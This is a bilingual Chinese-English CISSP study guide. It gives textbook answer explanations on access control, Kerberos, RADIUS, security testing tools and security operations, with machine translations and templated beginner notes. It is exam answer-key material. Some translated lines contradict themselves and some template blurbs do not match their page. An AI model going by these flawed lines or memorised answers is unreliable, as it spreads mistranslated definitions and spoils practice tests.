基于规则的访问控制模型使用应用于所有用户和其他主体的全局规则。 它不针对单个用户或本地应用规则。 8. B. ABAC 模型常用于 SDN 中。 其他选项通常不用于 SDN。 MAC 模型 使用标签来定义访问权限,而 RBAC 模型使用组。 在 DAC 模型中,所有 者向他人授予访问权限。 9. B. 在分层环境中,各种分类标签按从低安全到高安全的有序结构进行分 配。 强制访问控制(MAC)模型支持三种环境:分层、分隔和混合。 分隔 环境忽略层级,仅允许访问任何层级上的独立分隔区。 混合环境是分层和 分隔环境的组合。 MAC 模型不使用集中式环境。 10. B. MAC 模型使用标签来标识分类级别的上下限,这些标签定义了主体的 访问级别。 MAC 是一种非自主访问控制模型,使用标签。 然而,并非所有非 自主访问控制模型都使用标签。 DAC 和 ABAC 模型不使用标签。 11. C. 强制访问控制(MAC)模型依赖于为主体和对象使用标签。 当绘制出 来时,它们看起来类似于格状结构,因此MAC模型常被称为基于格的模型。 其他选项均未使用标签。 自主访问控制(DAC)模型允许对象的所有者控制 对对象的访问。

非自主访问控制具有集中式管理,例如在防火墙上部署的基 于规则的访问控制模型。 基于角色的访问控制(RBAC)模型根据与工作相 关的角色定义主体的访问权限。 12. A. 基于风险的访问控制模型可以要求用户使用多因素身份验证进行身份验 证。 列出的其他访问控制模型均无法评估用户的登录方式。 MAC模型使用标 签来授予访问权限。 RBAC模型根据工作角色或组授予访问权限。 在DAC模型 中,所有者授予对资源的访问权限。 13. A. 基于风险的访问控制模型评估环境和情境,然后根据编码策略做出访 问决策。 MAC模型使用标签授予访问权限。 RBAC模型使用一个良好的

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

分层:分层把控制按层排列,让攻击者必须连续突破。

防火墙:防火墙根据规则控制网络流量进出。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

serial controls 更深,parallel controls 更宽;题目会考深度和广度。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

身份管理题要区分识别、认证、授权、审计。

角色、岗位、职责分离常对应 RBAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
分层 分层把控制按层排列,让攻击者必须连续突破。
防火墙 防火墙根据规则控制网络流量进出。
身份 身份是主体在系统中的标识。
基于角色的访问控制 RBAC RBAC 按角色分配权限,适合岗位清晰的组织。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
自主访问控制 DAC DAC 由对象所有者决定谁能访问。
基于属性的访问控制 ABAC ABAC 根据用户、资源、环境等属性动态决策。
学习单元 129 / PDF P1523

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

defined collection of named job roles for access control. Administrators grant each job role with the privileges they need to perform their jobs. An ABAC model uses attributes to grant access and is often used in softwaredefined networks (SDNs). 14. A. OpenID Connect (OIDC) uses a JavaScript Object Notation (JSON) Web Token (JWT) that provides both authentication and profile information for internet-based single sign-on (SSO). None of the other options use tokens. OIDC is built on the OAuth 2.0 framework. TLS is a transport layer protocol that does not provide single sign-on. 15. D.

Configuring a central computer to synchronize its time with an external NTP server and all other systems to synchronize their time with the NTP will likely solve the problem and is the best choice of the available options. Kerberos requires computer times to be within 5 minutes of each other and the scenario, along with the available options, suggested the user's computer is not synchronized with the Kerberos server. Kerberos uses AES. However, because a user successfully logs on to one computer, it indicates Kerberos is working, and AES is installed. NAC checks a system's health after the user authenticates. NAC doesn't prevent a user from logging on.

Some federated systems use SAML, but Kerberos doesn't require SAML. 16. C. The primary purpose of Kerberos is authentication, since it allows users to prove their identity. It also provides a measure of confidentiality and integrity using symmetric key encryption, but these are not the primary purpose. Kerberos does not include logging capabilities, so it does not provide accountability. 17. B. The network access server is the client within a RADIUS architecture. The RADIUS server is the authentication server, and it provides authentication, authorization, and accounting (AAA) services. The network access server might have a host firewall enabled, but that isn't the primary function. 18. B.

The best choice is to give the administrator the root password. The administrator would enter it manually when running commands that need elevated privileges. Sudo access would allow the user to run commands requiring root-level privileges, under the context of the user account. If an attacker compromised the user account, the attacker could run the elevated commands with sudo. Linux systems don't have an administrator group or a LocalSystem account.

中文直译 / 整理

用于访问控制的已命名岗位角色的定义集合。 管理员为每个岗位角色授予 其执行工作所需的权限。 ABAC 模型使用属性来授予访问权限,常用于软 件定义网络(SDN)中。 14. A. OpenID Connect (OIDC) 使用 JavaScript 对象表示法 (JSON) Web 令牌 (JWT),该令牌为基于互联网的单点登录 (SSO) 提供身份验证和 配置文件信息。 其他选项均不使用令牌。 OIDC 基于 OAuth 2.0 框架构建。 TLS 是一种传输层协议,不提供单点登录功能。 15. D. 将一台中心计算机配置为与外部 NTP 服务器同步时间,并将所有其他 系统配置为与该 NTP 服务器同步时间,很可能会解决问题,也是现有选项中 的最佳选择。 Kerberos 要求计算机时间相互之间相差不超过 5 分钟,而本场 景及可用选项表明用户的计算机未与 Kerberos 服务器同步。 Kerberos 使用 AES。 然而,由于用户能够成功登录一台计算机,说明 Kerberos 正在运行, 且 AES 已安装。 NAC 在用户身份验证后检查系统的健康状况,但不会阻止 用户登录。

某些联合系统使用 SAML,但 Kerberos 不需要 SAML。 16. C. Kerberos 的主要目的是身份验证,因为它允许用户证明其身份。 它还 使用对称密钥加密提供一定程度的机密性和完整性,但这些并非主要目的。 Kerberos 不包含日志记录功能,因此不提供问责性。 17. B. 网络访问服务器是 RADIUS 架构中的客户端。 RADIUS 服务器是认 证服务器,提供认证、授权和计费(AAA)服务。 网络访问服务器可能启用 了主机防火墙,但这并非其主要功能。 18. B. 最佳选择是向管理员提供 root 密码。 管理员在运行需要提升权限的命 令时手动输入该密码。 Sudo 访问允许用户在自身账户上下文中运行需要 root 权限的命令。 如果攻击者入侵了用户账户,攻击者便可使用 sudo 运行 提升权限的命令。 Linux 系统没有管理员组或 LocalSystem 账户。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

AAA 服务:AAA 常说认证、授权、记账,但完整链条还包括识别和审计。

认证:认证是验证“你是不是你声称的那个人”。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

Identification 是声称身份,Authentication 是证明身份,Authorization 是允许做什么。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
AAA 服务 AAA 常说认证、授权、记账,但完整链条还包括识别和审计。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
问责性 问责性要求能把行为绑定到具体主体。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
学习单元 130 / PDF P1524

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

19. D. NTLM is known to be susceptible to pass-the-hash attacks, and this scenario describes a pass-the-hash attack. Kerberos attacks attempt to manipulate tickets, such as in pass the ticket and golden ticket attacks, but these are not NTLM attacks. A rainbow table attack uses a rainbow table in an offline brute-force attack. 20. C. Attackers can create golden tickets after successfully exploiting Kerberos and obtaining the Kerberos service account (KRBTGT). Golden tickets are not associated with Remote Authentication Dial-in User Service (RADIUS), Security Assertion Markup Language (SAML), or OpenID Connect (OIDC). 19. D. NTLM

中文直译 / 整理

已知易受传递哈希攻击,此场景描述了一次传递哈希攻击。 Kerberos 攻击试图操纵票据,例如传递票据和黄金票据攻击,但这些并非 NTLM 攻击。 彩虹表攻击使用彩虹表进行离线暴力破解。 20. C. 攻击者在成功利用 Kerberos 并获取 Kerberos 服务账户(KRBTGT) 后,可以创建黄金票据。 黄金票据与远程认证拨号用户服务(RADIUS)、安 全断言标记语言(SAML)或 OpenID Connect(OIDC)无关。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

哈希本身不提供机密性;它主要用于完整性校验。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
学习单元 131 / PDF P1525

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Chapter 15: Security Assessment and Testing 1. A. Nmap is a network discovery scanning tool that reports the open ports on a remote system and the firewall status of those ports. Nessus is a network vulnerability scanning tool. Metasploit is an exploitation framework used in penetration testing. lsof is a Linux command used to list open files on a system. 2. D. Only open ports represent potentially significant security risks. Ports 80 and 443 are expected to be open on a web server. Port 1433 is a database port and should never be exposed to an external network.

Port 22 is used for the Secure Shell protocol (SSH), and the filtered status indicates that Nmap can't determine whether it is open or closed. This situation does require further investigation, but it is not as alarming as a definitely exposed database server port. 3. C. The sensitivity of information stored on the system, difficulty of performing the test, and likelihood of an attacker targeting the system are all valid considerations when planning a security testing schedule. The desire to experiment with new testing tools should not influence the production testing schedule. 4. C.

Security assessments include many types of tests designed to identify vulnerabilities, and the assessment report normally includes recommendations for mitigation. The assessment does not, however, include actual mitigation of those vulnerabilities. 5. A. Security assessment reports should be addressed to the organization's management. For this reason, they should be written in plain English and avoid technical jargon. 6. C. Vulnerability scanners are used to test a system for known security vulnerabilities and weaknesses. They are not active detection tools for intrusion, they offer no form of enticement, and they do not configure system security.

In addition to testing a system for security weaknesses, they produce evaluation reports and make recommendations. 7. B. The server is likely running a website on port 80. Using a web browser to access the site may provide important information about the site's purpose. 8. B. The SSH protocol uses port 22 to accept administrative connections to a server.

中文直译 / 整理

第15章:安全评估与测试 1. A. Nmap 是一种网络发现扫描工具,用于报告远程系统上开放的端口及 其防火墙状态。 Nessus 是一种网络漏洞扫描工具。 Metasploit 是用于渗透 测试的利用框架。 lsof 是用于列出系统上打开文件的 Linux 命令。 2. D. 仅开放的端口才可能构成重大的安全风险。 端口 80 和 443 在 Web 服 务器上预期是开放的。 端口 1433 是数据库端口,绝不应暴露于外部网络。 端口 22 用于安全外壳协议(SSH),过滤状态表示 Nmap 无法确定其是否 开放或关闭。 这种情况需要进一步调查,但其危险性不如明确暴露的数据库 服务器端口高。 3. C. 系统上存储信息的敏感性、执行测试的难度以及攻击者针对系统的可能 性,都是规划安全测试计划时的合理考虑因素。 不应因希望尝试新测试工具 而影响生产环境的测试计划。 4. C. 安全评估包括多种旨在识别漏洞的测试,评估报告通常包含缓解建议。 然而,评估本身并不包括对这些漏洞的实际缓解。 5. A. 安全评估报告应提交给组织的管理层。 因此,它们应使用通俗易懂的 英语撰写,并避免使用技术术语。

6. C. 漏洞扫描器用于测试系统中已知的安全漏洞和弱点。 它们并非用于入 侵的主动检测工具,不提供任何形式的诱捕,也不配置系统安全。 除了测试 系统的安全弱点外,它们还会生成评估报告并提出建议。 7. B. 服务器很可能在端口 80 上运行网站。 使用网页浏览器访问该网站可能 提供有关网站用途的重要信息。 8. B. SSH 协议使用端口 22 来接受对 服务器的管 理连接。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

NIST:NIST 提供美国常用安全标准、框架和指南。

防火墙:防火墙根据规则控制网络流量进出。

漏洞扫描:漏洞扫描用工具找已知弱点。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

扫描发现弱点,不等于已经成功利用。

渗透测试需要书面授权、范围和规则。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
NIST NIST 提供美国常用安全标准、框架和指南。
防火墙 防火墙根据规则控制网络流量进出。
漏洞扫描 漏洞扫描用工具找已知弱点。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 132 / PDF P1526

第 1526 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

9. D. Authenticated scans can read configuration information from the target system and reduce the instances of false positive and false negative reports. 10. C. The TCP SYN scan sends a SYN packet and receives a SYN ACK packet in response, but it does not send the final ACK required to complete the three-way handshake. 11. D. SQL injection attacks are web vulnerabilities, and Matthew would be best served by a web vulnerability scanner. A network vulnerability scanner might also pick up this vulnerability, but the web vulnerability scanner is specifically designed for the task and more likely to be successful. 12. C.

The scenario does not provide us with enough information to determine whether this exercise involved red team, blue team, or purple team tactics, and in fact, those exercises typically involve live access to systems. Tabletop exercises, on the other hand, are designed to walk teams through a scenario, and that is what Tina is doing in this instance. 13. B. Metasploit is an automated exploit tool that allows attackers to easily execute common attack techniques. Nmap is a port scanning tool. Nessus is a network vulnerability scanner, and Nikto is a web application scanner. While these other tools might identify potential vulnerabilities, they do not go as far as to exploit them. 14. C.

Mutation fuzzing uses bit flipping and other techniques to slightly modify previous inputs to a program in an attempt to detect software flaws. 15. A. Misuse case testing identifies known ways that an attacker might exploit a system and tests explicitly to see if those attacks are possible in the proposed code. 16. B. User interface testing includes assessments of both graphical user interfaces (GUIs) and command-line interfaces (CLIs) for a software program. 17. B. During a white-box penetration test, the testers have access to detailed configuration information about the system being tested. 18. B. Unencrypted HTTP communications take place over TCP port 80 by default. 9. D.

中文直译 / 整理

已认证扫描可以读取目标系统的配置信息,并减少误报和漏报的 实例。 10. C. TCP SYN扫描发送一个SYN数据包,并接收一个SYN ACK数据包作为 响应,但不会发送完成三次握手所需的最终ACK。 11. D. SQL注入攻击是Web漏洞,Matthew最好使用Web漏洞扫描器。 网 络漏洞扫描器也可能发现此漏洞,但Web漏洞扫描器专为此任务设计,更 有可能成功。 12. C. 该情景未提供足够信息以确定此演练是否涉及红队、蓝队或紫队战术, 事实上,这些演练通常涉及对系统的实时访问。 而桌面演练的设计目的是引 导团队逐步演练场景,这正是Tina在此情况下所进行的。 13. B. Metasploit是一种自动化渗透工具,允许攻击者轻松执行常见的攻击技 术。 Nmap是一个端口扫描工具。 Nessus是一个网络漏洞扫描器,Nikto是一 个Web应用程序扫描器。 虽然这些其他工具可能识别潜在漏洞,但它们不会 进一步利用这些漏洞。 14. C. 变异模糊测试使用位翻转和其他技术对程序的先前输入进行微小修 改,以尝试检测软件缺陷。

15. A. 滥用案例测试识别攻击者可能利用系统的已知方式,并明确测试这些 攻击在所提议的代码中是否可能发生。 16. B. 用户界面测试包括对软件程序的图形用户界面(GUI)和命令行界 面(CLI)的评估。 17. B. 在白盒渗透测试期间,测试人员可以访问有关被测系统的详细配置信息。 18. B. 未加密的 HTTP 通信默认通过 TCP 端口 80 进行。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1526 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
漏洞扫描 漏洞扫描用工具找已知弱点。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 133 / PDF P1527

第 1527 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

19. B. There are only two types of SOC report: Type I and Type II. Both reports provide information on the suitability of the design of security controls. Only a Type II report also provides an opinion on the operating effectiveness of those controls over an extended period of time. 20. B. The backup verification process ensures that backups are running properly and thus meeting the organization's data protection objectives. 19. B. SOC

中文直译 / 整理

报告只有两种类型:类型 I 和类型 II。 这两种报告都提供有关安 全控制设计适当性的信息。 只有类型 II 报告还提供对这些控制在较长时间内 运行有效性的意见。 20. B. 备份验证过程确保备份正常运行,从而满足组织的数据保护目标。

小白解释

场景先行:你是公司的安全负责人,正在读第 1527 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1527 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 134 / PDF P1528

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Chapter 16: Managing Security Operations 1. C. The need-to-know policy operates on the basis that any given system user should be granted access only to portions of sensitive information or materials necessary to perform some task. The principle of least privilege ensures personnel are granted only the permissions they need to perform their job and no more. Segregation of duties ensures that no single person has total control over a critical function or system. There isn't a standard principle called “as-needed basis.” 2. C. Need-to-know is the requirement to have access to, knowledge about, or possession of data to perform specific work tasks, but no more.

The principle of least privilege includes both rights and permissions, but the term principle of least permission is not valid within IT security. Segregation of duties (SoD) ensures that a single person doesn't control all the elements of a process. A segregation of duties policy ensures that no single person has total control over a critical function. A job rotation policy requires employees to rotate to different jobs periodically 3. C. An organization applies the least privilege principle to ensure employees receive only the access they need to complete their job responsibilities. Need-to-know refers to permissions only, while privileges include both rights and permissions.

A mandatory vacation policy requires employees to take a vacation in oneor two-week increments. An SLA identifies performance expectations and can include monetary penalties. 4. D. Microsoft domains include a privileged account management solution that grants administrators elevated privileges when they need them, but restricts the access using a time-limited ticket. The principle of least privilege includes both rights and permissions, but the term principle of least permission is not valid within IT security. Segregation of duties ensures that a single person doesn't control all the elements of a process or a critical function.

Need-to-know is the requirement to have access to, knowledge about, or possession of data to perform specific work tasks, but no more. 5. D. The default level of access, should be no access. The principle of least privilege dictates that users should only be granted the level of access they need for their job, and the question doesn't indicate that new users need any access to the database. Read access, modify access, and full

中文直译 / 整理

第16章:安全管理运营 1. C. 按需知悉策略基于以下原则:任何系统用户只能被授予执行特定任务 所必需的敏感信息或材料的访问权限。 最小权限原则确保人员仅被授予履 行其工作所需的权限,且不多于必要。 职责分离原则确保没有任何个人对 关键功能或系统拥有完全控制权。 不存在名为“按需基础”的标准原则。 2. C. 按需知悉是指为执行特定工作任务而必须访问、了解或拥有数据,但 不得超出此范围。 最小权限原则包括权利和权限,但“最小权限原则”这一 术语在IT安全中并不成立。 职责分离(SoD)确保没有人能控制流程的所有 环节。 职责分离政策确保没有任何个人对关键功能拥有完全控制权。 工作轮 换政策要求员工定期轮换到不同的岗位。 3. C. 组织应用最小权限原则,以确保员工仅获得完成其工作职责所需的访 问权限。 按需知晓仅指权限,而权限则包括权利和权限。 强制休假政策要求 员工以一至两周为增量休假。 SLA 确定性能预期,并可能包括经济处罚。 4. D. Microsoft 域包含一个特权账户管理解决方案,该方案在管理员需要时 授予其提升的权限,但通过限时票据限制访问。

最小权限原则包括权利和权 限,但“最小权限原则”这一术语在 IT 安全中无效。 职责分离确保单个人 不控制流程或关键功能的所有要素。 按需知晓是指为执行特定工作任务而必 须访问、了解或拥有数据,且不得超出此范围。 5. D. 默认访问级别应为无访问权限。 最小权限原则规定,用户应仅被授予 其工作所需的访问级别,而问题并未表明新用户需要对数据库有任何访问权 限。 读取权限、修改权限和完全

小白解释

场景先行:你是公司的安全负责人,正在读第 1528 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
学习单元 135 / PDF P1529

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

access grants users some level of access, which violates the principle of least privilege. 6. A. Each account should be given only the rights and permissions needed to perform their job when following the least privilege policy. New employees would not need full rights and permissions to a server. Employees will need some rights and permissions in order to do their job. Regular user accounts should not be added to the Administrators group. 7. C. Segregation of duties ensures that no single entity can perform all of the tasks for a job or function. A job rotation policy moves employees to different jobs periodically. A mandatory vacation policy requires employees to take vacations.

A least privilege policy ensures users have only the privileges they need, and no more. 8. A. A job rotation policy has employees rotate jobs or job responsibilities and can help detect collusion and fraud. A segregation of duties policy ensures that a single person doesn't control all elements of a specific function. Mandatory vacation policies ensure that employees take an extended time away from their job, requiring someone else to perform their job responsibilities, which increases the likelihood of discovering fraud. Least privilege ensures that users have only the permissions they need to perform their job and no more. 9. B. Mandatory vacation policies help detect fraud.

They require employees to take an extended time away from their job, requiring someone else to perform their job responsibilities, which increases the likelihood of discovering fraud. It does not rotate job responsibilities. While mandatory vacations might help employees reduce their overall stress levels and increase productivity, these are not the primary reasons for mandatory vacation policies. 10. C. A service-level agreement (SLA) can provide monetary penalties if a third-party provider doesn't meet its contractual requirements. Neither a memorandum of understanding (MOU) nor an interconnection security agreement (ISA) includes monetary penalties.

Segregation of duties (SoD) is sometimes shortened to SED, but this is unrelated to third-party relationships. 11. A. The IaaS service model provides an organization with the most control compared to the other models, and this model requires the organization to perform all maintenance on operating systems and applications. The

中文直译 / 整理

访问权限授予用户一定程度的访问权,这违反了最小权限原则。 6. A. 根据最小权限原则,每个账户应仅获得执行其工作所需的权限和权利。 新员工不需要对服务器拥有完整权限和权利。 员工需要一些权限和权利才能 完成工作。 常规用户账户不应被添加到管理员组中。 7. C. 职责分离确保没有任何单一主体能够执行某项工作或功能的所有任务。 工作轮换政策会定期将员工调至不同岗位。 强制休假政策要求员工休假。 最 小权限原则确保用户仅拥有其工作所需的权限,且不多余。 8. A. 工作轮换政策使员工轮换岗位或工作职责,有助于发现串通和欺诈行 为。 职责分离政策确保没有人能控制某一特定功能的所有环节。 强制休假政 策确保员工离开工作岗位较长时间,需要他人代为履行其职责,从而提高发 现欺诈的可能性。 最小权限原则确保用户仅拥有执行其工作所需的权限,且 不多余。 9. B. 强制休假政策有助于发现欺诈行为。 它们要求员工长时间离开工作岗位, 由他人接替其职责,从而增加发现欺诈的可能性。 强制休假并不轮换工作职 责。 尽管强制休假可能有助于员工降低整体压力水平并提高生产力,但这些 并非强制休假政策的主要目的。

10. C. 服务级别协议(SLA)可在第三方提供商未履行合同要求时提供经济处 罚。 谅解备忘录(MOU)和互连安全协议(ISA)均不包含经济处罚。 职责 分离(SoD)有时简称为SED,但这与第三方关系无关。 11. A. IaaS 服务模型相比其他模型为组织提供了最大的控制权,且该模型要 求组织自行执行操作系统和应用程序的所有维护工作。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

